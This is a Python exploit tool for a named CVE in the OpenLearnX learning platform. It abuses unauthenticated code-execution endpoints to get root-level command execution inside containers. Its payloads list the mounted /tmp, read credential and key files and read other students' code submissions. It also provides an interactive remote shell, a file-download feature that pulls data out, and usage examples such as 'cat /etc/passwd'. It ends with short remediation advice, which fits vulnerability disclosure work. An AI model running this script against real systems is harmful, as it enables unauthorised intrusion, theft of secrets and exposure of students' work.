#!/usr/bin/env python3 import argparse import json import os import readline import sys import textwrap import urllib.error import urllib.request from datetime import datetime, timezone RESET = "\033[0m" BOLD = "\033[1m" RED = "\033[91m" GREEN = "\033[92m" YELLOW = "\033[93m" BLUE = "\033[94m" CYAN = "\033[96m" DIM = "\033[2m" MAG = "\033[95m" WHITE = "\033[97m" BANNER = f""" {BLUE}╔═══════════════════════════════════════════════════════════════════╗{RESET} {BLUE}║{RESET} {BLUE}║{RESET} {BLUE}║{RESET} {BOLD}{WHITE} ██████╗ ██╗ ██╗ ██╗ ██████╗ ██████╗███████╗{RESET} {BLUE}║{RESET} {BLUE}║{RESET} {BOLD}{WHITE}██╔═══██╗██║ ╚██╗██╔╝ ██╔══██╗██╔════╝██╔════╝{RESET} {BLUE}║{RESET} {BLUE}║{RESET} {BOLD}{WHITE}██║ ██║██║ ╚███╔╝ ██████╔╝██║ █████╗ {RESET} {BLUE}║{RESET} {BLUE}║{RESET} {BOLD}{WHITE}██║ ██║██║ ██╔██╗ ██╔══██╗██║ ██╔══╝ {RESET} {BLUE}║{RESET} {BLUE}║{RESET} {BOLD}{WHITE}╚██████╔╝███████╗██╔╝ ██╗ ██║ ██║╚██████╗███████╗{RESET} {BLUE}║{RESET} {BLUE}║{RESET} {BOLD}{WHITE} ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝{RESET} {BLUE}║{RESET} {BLUE}║{RESET} {BLUE}║{RESET} {BLUE}║{RESET} {CYAN}OpenLearnX Unauthenticated RCE via Container Volume Mount{RESET} {BLUE}║{RESET} {BLUE}║{RESET} {DIM}Tempfile dir traversal → Secret leak → Root container exec{RESET} {BLUE}║{RESET} {BLUE}║{RESET} {BLUE}║{RESET} {BLUE}║{RESET} {YELLOW}CVE-2026-41900{RESET} • {YELLOW}GHSA-8h25-q488-4hxw{RESET} {BLUE}║{RESET} {BLUE}║{RESET} {BLUE}║{RESET} {BLUE}║{RESET} {MAG}by Christbowel{RESET} {BLUE}║{RESET} {BLUE}╚═══════════════════════════════════════════════════════════════════╝{RESET} """ ENDPOINTS = [ "/api/compiler/execute", "/api/coding/execute", "/execute", ] FAIL_PATTERNS = [ "operation not permitted", "permission denied", "no such file", "not found", "cannot open", "traceback", "blocked", "security violation", "modulenotfounderror", ] GADGETS = { "listing": { "severity": "HIGH", "cwe": "CWE-538", "desc": "Directory listing of mounted /tmp via /app", "code": textwrap.dedent("""\ import os base = '/app' entries = os.listdir(base) print(f"LISTING:{len(entries)}") for e in sorted(entries): full = os.path.join(base, e) size = os.path.getsize(full) if os.path.isfile(full) else -1 tag = "DIR" if os.path.isdir(full) else f"{size}B" print(f" {tag:>10s} {e}") """), "check": lambda o: "LISTING:" in o and int(o.split("LISTING:")[1].split("\n")[0]) > 1, }, "secrets": { "severity": "CRITICAL", "cwe": "CWE-538 / CWE-377", "desc": "Read credentials and secrets from /tmp", "code": textwrap.dedent("""\ import os, glob found = False for pat in ['/app/*.conf', '/app/*.pem', '/app/*.key', '/app/*.env', '/app/*.json', '/app/*.yml', '/app/*.yaml', '/app/*.cfg', '/app/*.ini', '/app/*.secret', '/app/*.sock']: for f in glob.glob(pat): if os.path.isfile(f) and os.path.getsize(f) < 50000: found = True print(f"FILE:{os.path.basename(f)}:{os.path.getsize(f)}") print(open(f).read()[:800]) print("---") if not found: for f in sorted(glob.glob('/app/*'))[:15]: if os.path.isfile(f) and not f.endswith('.py') and os.path.getsize(f) < 50000: found = True print(f"FILE:{os.path.basename(f)}:{os.path.getsize(f)}") print(open(f).read()[:500]) print("---") if not found: print("NO_FILES") """), "check": lambda o: "FILE:" in o, }, "submissions": { "severity": "HIGH", "cwe": "CWE-538", "desc": "Read other students' code submissions from /tmp", "code": textwrap.dedent("""\ import os, glob own = os.path.abspath(__file__) if '__file__' in dir() else '' pyfiles = [f for f in glob.glob('/app/*.py') if os.path.isfile(f) and os.path.abspath(f) != own] if pyfiles: print(f"SUBMISSIONS:{len(pyfiles)}") for f in sorted(pyfiles)[:10]: print(f"\\n--- {os.path.basename(f)} ({os.path.getsize(f)}B) ---") print(open(f).read()[:600]) else: print("NO_SUBMISSIONS") """), "check": lambda o: "SUBMISSIONS:" in o, }, "rootcheck": { "severity": "MEDIUM", "cwe": "CWE-250", "desc": "Confirm root execution (no user= in containers.run)", "code": "import os; uid=os.getuid(); gid=os.getgid(); print(f'UID:{uid} GID:{gid}')", "check": lambda o: "UID:0" in o, }, "caps": { "severity": "MEDIUM", "cwe": "CWE-250", "desc": "Default Docker capabilities (no cap_drop)", "code": textwrap.dedent("""\ caps = {} for line in open('/proc/1/status'): if line.startswith('Cap'): k, v = line.strip().split(':\\t') caps[k] = v eff = int(caps.get('CapEff', '0'), 16) print(f"CAPEFF:0x{eff:016x}") print("DEFAULT_CAPS" if eff > 0 else "CAPS_DROPPED") """), "check": lambda o: "DEFAULT_CAPS" in o, }, } def log_ok(msg): print(f" {GREEN}[+]{RESET} {msg}") def log_fail(msg): print(f" {RED}[-]{RESET} {msg}") def log_info(msg): print(f" {BLUE}[*]{RESET} {msg}") def log_warn(msg): print(f" {YELLOW}[!]{RESET} {msg}") def log_hit(sev, msg): colors = {"CRITICAL": RED, "HIGH": YELLOW, "MEDIUM": CYAN, "INFO": DIM} c = colors.get(sev, WHITE) print(f" {c}[{sev}]{RESET} {msg}") def http_post(url, payload, timeout=20): body = json.dumps(payload).encode() req = urllib.request.Request(url, data=body, headers={"Content-Type": "application/json"}, method="POST") try: with urllib.request.urlopen(req, timeout=timeout) as resp: return resp.status, json.loads(resp.read()) except urllib.error.HTTPError as e: try: return e.code, json.loads(e.read()) except Exception: return e.code, {"error": str(e)} except urllib.error.URLError as e: return 0, {"error": f"{e.reason}"} except Exception as e: return 0, {"error": str(e)} def http_get(url, timeout=10): req = urllib.request.Request(url, method="GET") try: with urllib.request.urlopen(req, timeout=timeout) as resp: return resp.status, json.loads(resp.read()) except Exception: return 0, {} def execute(endpoint, code, lang="python"): status, resp = http_post(endpoint, {"language": lang, "code": code}) output = (resp.get("output") or "").strip() error = (resp.get("error") or "").strip() blocked = resp.get("blocked", False) return output, error, blocked def is_hit(output, blocked=False): if blocked or not output: return False low = output.lower() return not any(p in low for p in FAIL_PATTERNS) def find_endpoint(target): for suffix in ENDPOINTS: url = target + suffix log_info(f"Probing {DIM}{url}{RESET}") out, err, blk = execute(url, 'print("OLX_PROBE_OK")') if "OLX_PROBE_OK" in out: log_ok(f"Live endpoint: {GREEN}{url}{RESET}") return url elif blk: log_warn(f"Blocked (patched?) at {url}") return None def run_check(target): print(f"\n{BOLD}[CHECK]{RESET} Verifying {target}\n") health_url = target + "/api/compiler/health" log_info(f"GET {health_url}") status, resp = http_get(health_url) if status == 200: log_ok(f"Health OK — Docker: {resp.get('docker_available')}") else: log_info("Health endpoint not found (expected for pre-patch)") ep = find_endpoint(target) if not ep: log_fail("No live execution endpoint found") return None, False out, _, _ = execute(ep, "import os; print(f'UID:{os.getuid()}')") root = "UID:0" in out out2, _, _ = execute(ep, textwrap.dedent("""\ import os try: n = len(os.listdir('/app')) print(f"MOUNT:{n}") except: print("NO_MOUNT") """)) mount = "MOUNT:" in out2 print() if root and mount: log_ok(f"{GREEN}VULNERABLE{RESET} — root exec + /tmp volume mount exposed") return ep, True elif mount: log_warn(f"{YELLOW}PARTIAL{RESET} — /tmp mounted but not root") return ep, True elif root: log_warn(f"{YELLOW}PARTIAL{RESET} — root exec but /tmp not mounted") return ep, True else: log_fail(f"{RED}NOT VULNERABLE{RESET} — patched or different config") return ep, False def run_gadget(ep, name): g = GADGETS[name] log_hit(g["severity"], f"{g['desc']} {DIM}({g['cwe']}){RESET}") out, err, blk = execute(ep, g["code"]) if blk: print(f" {RED}BLOCKED{RESET} — security filter") return False if g["check"](out): for line in out.splitlines()[:30]: print(f" {DIM}│{RESET} {line}") return True else: detail = out[:120] or err[:120] or "(empty)" print(f" {DIM}not confirmed: {detail}{RESET}") return False def run_all_gadgets(ep): print(f"\n{BOLD}[EXPLOIT]{RESET} Running all gadgets against {CYAN}{ep}{RESET}\n") results = {} evidence = [] for name, g in GADGETS.items(): hit = run_gadget(ep, name) results[name] = hit if hit: evidence.append({"gadget": name, "severity": g["severity"], "cwe": g["cwe"]}) print() return results, evidence def run_command(ep, cmd): code = textwrap.dedent(f"""\ import subprocess r = subprocess.run({repr(cmd)}, shell=True, capture_output=True, text=True, timeout=15) if r.stdout: print(r.stdout, end='') if r.stderr: print(r.stderr, end='') """) out, err, blk = execute(ep, code) if blk: return f"{RED}[blocked by security filter]{RESET}" return out or err or "" def interactive_shell(ep): print(f"\n{BOLD}{CYAN}┌──────────────────────────────────────────────┐{RESET}") print(f"{BOLD}{CYAN}│ OLX Remote Shell — CVE-2026-41900 │{RESET}") print(f"{BOLD}{CYAN}│ Type 'exit' or Ctrl+C to quit │{RESET}") print(f"{BOLD}{CYAN}│ Each command spawns a new container │{RESET}") print(f"{BOLD}{CYAN}└──────────────────────────────────────────────┘{RESET}\n") out, _, _ = execute(ep, "import os; print(os.uname().nodename)") hostname = out.strip() or "container" histfile = os.path.expanduser("~/.olx_shell_history") try: readline.read_history_file(histfile) except FileNotFoundError: pass while True: try: prompt = f"{RED}root@{hostname}{RESET}:{BLUE}/app{RESET}# " cmd = input(prompt) except (EOFError, KeyboardInterrupt): print(f"\n{DIM}[shell closed]{RESET}") break cmd = cmd.strip() if not cmd: continue if cmd.lower() in ("exit", "quit"): print(f"{DIM}[shell closed]{RESET}") break if cmd.startswith("download "): remote_path = cmd.split(" ", 1)[1].strip() download_file(ep, remote_path) continue result = run_command(ep, cmd) if result: print(result) try: readline.write_history_file(histfile) except Exception: pass def download_file(ep, remote_path): if not remote_path.startswith("/app/"): remote_path = "/app/" + remote_path.lstrip("/") code = textwrap.dedent(f"""\ import base64, os path = {repr(remote_path)} if os.path.isfile(path): data = open(path, 'rb').read() print(f"SIZE:{{len(data)}}") print(base64.b64encode(data).decode()) else: print("NOT_FOUND") """) out, err, blk = execute(ep, code) if "NOT_FOUND" in out or blk: log_fail(f"File not found: {remote_path}") return lines = out.strip().splitlines() if len(lines) >= 2 and lines[0].startswith("SIZE:"): import base64 size = int(lines[0].split(":")[1]) data = base64.b64decode(lines[1]) local = os.path.basename(remote_path) with open(local, "wb") as f: f.write(data) log_ok(f"Downloaded {local} ({size}B)") else: log_fail(f"Unexpected response: {out[:100]}") def save_evidence(target, ep, evidence): report = { "cve": "CVE-2026-41900", "ghsa": "GHSA-8h25-q488-4hxw", "target": target, "endpoint": ep, "auth_required": False, "timestamp": datetime.now(timezone.utc).isoformat(), "findings": evidence, } path = "cve-2026-41900-evidence.json" with open(path, "w") as f: json.dump(report, f, indent=2) return path def print_report(target, ep, results, evidence): total = sum(1 for v in results.values() if v) sevmap = {} for e in evidence: sevmap.setdefault(e["severity"], []).append(e["gadget"]) print(f"\n{BLUE}{'═' * 65}{RESET}") print(f" {BOLD}CVE-2026-41900 — RESULTS{RESET}") print(f"{BLUE}{'═' * 65}{RESET}") print(f" Target : {WHITE}{target}{RESET}") print(f" Endpoint : {CYAN}{ep}{RESET}") print(f" Auth : {RED}NONE REQUIRED{RESET}") print(f" Date : {datetime.now(timezone.utc).strftime('%Y-%m-%d %H:%M:%S UTC')}") print() if total == 0: log_fail("No vectors confirmed — instance appears patched") else: for sev in ("CRITICAL", "HIGH", "MEDIUM"): if sev in sevmap: colors = {"CRITICAL": RED, "HIGH": YELLOW, "MEDIUM": CYAN} c = colors[sev] print(f" {c}[{sev:>8s}]{RESET} {', '.join(sevmap[sev])}") print(f"\n {BOLD}Total : {total} confirmed{RESET}") print() print(f" {GREEN}REMEDIATION:{RESET}") print(f" {DIM}→ Update to commit 14765d7 or later{RESET}") print(f" {DIM}→ Apply: cap_drop=['ALL'], user='65534:65534'{RESET}") print(f" {DIM}→ Use per-execution tmpdir, not shared /tmp{RESET}") print(f"{BLUE}{'═' * 65}{RESET}") if evidence: path = save_evidence(target, ep, evidence) print(f"\n {GREEN}Evidence → {path}{RESET}") def build_parser(): p = argparse.ArgumentParser( prog="olx-rce", description="CVE-2026-41900 — OpenLearnX Unauthenticated RCE via Container Volume Mount", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=textwrap.dedent(f"""\ {BOLD}examples:{RESET} %(prog)s --check http://target:5000 %(prog)s --exploit http://target:5000 %(prog)s --shell http://target:5000 %(prog)s -c "id" http://target:5000 %(prog)s -c "cat /etc/passwd" http://target:5000 %(prog)s --gadget secrets http://target:5000 %(prog)s --gadget listing --gadget caps http://target:5000 {BOLD}gadgets:{RESET} listing /tmp directory listing via volume mount [HIGH] secrets Read credentials and keys from /tmp [CRITICAL] submissions Read other users' code submissions [HIGH] rootcheck Confirm UID 0 execution [MEDIUM] caps Dump effective Linux capabilities [MEDIUM] {BOLD}shell commands:{RESET} download Exfiltrate a file from /app to local dir exit Close the shell """), ) mode = p.add_argument_group("modes") mode.add_argument("--check", action="store_true", help="Check if target is vulnerable (no exploitation)") mode.add_argument("--exploit", action="store_true", help="Run all gadgets and generate evidence report") mode.add_argument("--shell", action="store_true", help="Drop into an interactive remote shell") mode.add_argument("-c", "--command", metavar="CMD", help="Execute a single command and exit") mode.add_argument("--gadget", action="append", metavar="NAME", choices=list(GADGETS.keys()), help="Run a specific gadget (repeatable)") p.add_argument("target", metavar="TARGET", help="Base URL of the OpenLearnX instance (e.g. http://host:5000)") p.add_argument("-q", "--quiet", action="store_true", help="Suppress banner") return p def main(): parser = build_parser() args = parser.parse_args() if not args.quiet: print(BANNER) target = args.target.rstrip("/") if not any([args.check, args.exploit, args.shell, args.command, args.gadget]): parser.print_help() sys.exit(0) if args.check: ep, vuln = run_check(target) sys.exit(0 if vuln else 1) ep = find_endpoint(target) if not ep: log_fail("No live execution endpoint found") log_info("Run with --check for detailed diagnostics") sys.exit(1) if args.command: result = run_command(ep, args.command) print(result) sys.exit(0) if args.gadget: print(f"\n{BOLD}[GADGETS]{RESET} {', '.join(args.gadget)}\n") for name in args.gadget: run_gadget(ep, name) print() sys.exit(0) if args.exploit: results, evidence = run_all_gadgets(ep) print_report(target, ep, results, evidence) sys.exit(0 if any(results.values()) else 1) if args.shell: interactive_shell(ep) sys.exit(0) if __name__ == "__main__": main()